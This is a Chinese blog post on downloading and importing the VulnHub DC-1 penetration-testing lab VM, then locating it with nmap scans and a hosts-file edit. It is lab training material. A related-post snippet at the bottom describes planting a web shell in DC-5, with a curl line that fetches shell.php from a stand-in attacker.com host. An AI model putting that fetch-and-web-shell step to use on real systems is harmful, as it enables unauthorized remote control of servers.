2022-渗透测试-DC靶场的下载、安装与访问

已于 2022-02-04 23:09:50 修改
阅读量4.7k 收藏 27
点赞数 11
分类专栏: 渗透测试 kali linux 网络安全 文章标签: 运维 渗透测试 kali linux web安全 安全
于 2022-02-03 22:20:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38612882/article/details/122779202
版权

目录

1.DC靶场下载

2.DC靶场的安装

3.DC靶场的访问

1.DC靶场下载

下载链接如下

Vulnerable By Design - Search: dc (Page 2) ~ VulnHubhttps://www.vulnhub.com/?page=2&q=dcDC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场。

 2.DC靶场的安装

 以DC-1为例,将文件解压。

 打开虚拟机,选择解压好的文件

 导入虚拟机

 vof版本高于4.0,点击重试即可导入

 导入成功,开启此虚拟机。

 点击是即可。

 当页面出现DC-1 login时表示安装成功。

3.DC靶场的访问

使用nmap,快读探测网段内存活主机,输入命令:nmap -sP --min-hostgroup 1024 --min-parallelism 1024 192.168.120.0/24,发现靶场主机ip地址

 使用命令:nmap -A -p- -T4 192.168.120.134,探测靶场突破口,发现开启的端口22,80,111,10409

 访问80端口,寻找进一步突破口,直接使用ip访问会跳转到http://dc-1/,无法正常访问所以添加hosts文件,让这个跳转域名来访问靶场ip。

Windows:

可以访问本地hosts,打开C:\Windows\System32\drivers\etc,修改hosts文件

 Linux:在/etc/hosts文件中添加域名。

打开浏览器,访问即可。

 接下来,就可以进行渗透了。后面我也会发布DC的9个靶场的渗透攻略。

保持微笑-泽
关注
  • 11
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
渗透测试DC系列
做一个俗人
03-17 611
渗透测试DC-1 小伙伴们打过DC机嘛,昨天一个刚进门的小老弟从头问到尾,今天也是有时间,详细走一遍我们打DC机流程,详细讲解一哈,可能比较啰嗦但是,对小白还是很有帮助的,大佬微喷~ 环境搭建就不过多介绍了,文末会放上DC机的下载连接,我们直接开始~ 1、如下图所示,我们需要准备,dc-1机环境,kali攻击机环境,需搭建一个虚拟网络,使他们在同一网段上。例如VMnet1,可自选,只要你的本机开启对应得虚拟网络,dckali保持同一类型就可以。 2、先看一下我们所存在得网段-ifconfig
Vulnhub渗透测试 DC-8
12-07
Vulnhub渗透测试 DC-8
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念验证”部分是由于 Twitter 上提出的有关双因素身份验证和 Linux 的问题以及 @theart42 的建议而产生的。 这一挑战的最终目标是绕过双因素身份验证、获得 root 权限并读取唯一的标志。 除非您尝试通过 SSH 登录,否则您可能甚至不知道已经安装和配置了双因素身份验证,但它确实存在并且正在发挥作用。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来说,Google 可以提供很大的帮助,但您可以随时发推文@DCAU7 寻求帮助,以帮助您重新开始。但请注意:我不会给你答案,相反,我会给你一个如何继续前进的想法。
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来说,Google 可以提供很大的帮助,但您可以随时发推文@DCAU7 寻求帮助,以帮助您重新开始。但请注意:我不会给你答案,相反,我会给你一个如何继续前进的想法。
DC-1靶场详解
最新发布
苏生要努力
03-12 1519
DC-1的下载地址为:https://www.vulnhub.com/entry/dc-1,292/
DC-4靶场搭建及渗透实战详细过程(DC靶场系列)
金 帛的博客
07-28 4083
dc-4靶场详细渗透过程
DC-1靶场(CVE-2018-7600)
lionwerson的博客
10-14 1771
1.下载DC-1靶场: DC-1下载地址https://download.vulnhub.com/dc/DC-1.zip2.解压打开靶场,导入虚拟机网络模式改为桥接模式,打开虚拟机。 3.浏览器访问80端口,其实也可以先用nmap扫描一下端口。 是一个Drupal CMS。 4.先挂扫描器走一波。 发现存在CVE-2018-7600的Drupal的一个RCE,并且小于7的版本都可以,这个应该就是这个靶场的主要漏洞了。 poc如下: 漏洞存在,验证 poc: #!/usr/b..
机3 DC-2(过程超详细)
honest_gg的博客
09-26 1415
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场
DC-9靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
08-09 4326
dc-9靶场详细渗透过程
DC-7靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
08-08 2634
dc-7靶场详细渗透过程
DC-8靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
08-08 3120
dc-8靶场详细渗透过程
Vulnhub渗透测试 DC-3
12-07
Vulnhub渗透测试 DC-3
Vulnhub渗透测试 DC-7
12-07
Vulnhub渗透测试 DC-7
DC-5机渗透笔记(有下载链接)
qq_45900622的博客
05-29 1697
DC-5下载地址:下载链接 主机发现 a.查看本kali(攻击机)ip地址 ifconfigb.扫面本攻击机本网段发现机 nmap -sP 192.168.6.0/24 机ip为192.168.6.134 扫描机端口确认服务 nmap -A 192.168.6.134 发现机开放80端口,nginx 打开浏览器访问一下瞅瞅 访问192.168.6.134 浏览一下发现就contact有个提交界面 随便提交一下 刷新一下发现页脚码的时间多次变化 … 没啥头绪,用dirbuster扫面一下
DC机系列:DC-6
Ays.Ie的博客
02-28 510
本篇文章为DC系列第6个机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
Pikachu漏洞靶场的简介、下载安装
热门推荐
WX公众号-小白学安全
04-01 1万+
文章目录简介 简介 pikachu是一个漏洞练习平台。其中包含了常见的web安全漏洞 Burt Force(暴力**漏洞) XSS(跨站脚本漏洞) CSRF(跨站请求伪造) SQL-Inject(SQL注入漏洞) RCE(远程命令/代码执行) Files Inclusion(文件包含漏洞) Unsafe file downloads(不安全的文件下载) Unsafe file uploads(不安全的文件上传) Over Permisson(越权漏洞) …/…/…/(目录遍历) I can se
DC系列DC-1
weixin_53067829的博客
07-01 927
DC系列
如何再kali下载iwebsec靶场
weixin_62693307的博客
11-05 243
这个靶场有三种搭建方法:第二种是虚拟机版本的,直接下载到本地搭建而第三种就是利用docker搭建这个靶场,我这里是用kali进行演示apt-get install docker.io #安装docker输入docker,出现以下东西即表示docker安装成功systemctl start docker #启动docker。
DC-5靶场渗透过程中,怎样挂载木马文件
06-02
DC-5 靶场渗透过程中,如果要挂载木马文件,可以按照以下步骤进行操作: 1. 找到可写入的目录:可以使用 `ls -al` 命令查看目录权限,找到可写入的目录。通常会有一些临时目录或者上传目录是可写入的。 2. 上传木马文件:将自己准备好的木马文件上传到可写入的目录中。可以使用 `curl` 或者 `wget` 命令进行上传,例如: ``` curl -o shell.php http://attacker.com/shell.php ``` 上述命令会将 `shell.php` 文件下载到本地,并保存到当前目录下。 3. 运行木马文件:在浏览器中访问上传的木马文件,例如 `http://dc5/wordpress/wp-content/plugins/akismet/views/akismet.php`。如果一切正常,就可以获得一个远程 shell,并在目标系统中执行任意命令了。 需要注意的是,这种做法是违法的,仅用于学习和研究目的,切勿在未授权的情况下对他人的系统进行攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

保持微笑-泽

谢谢鼓励

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值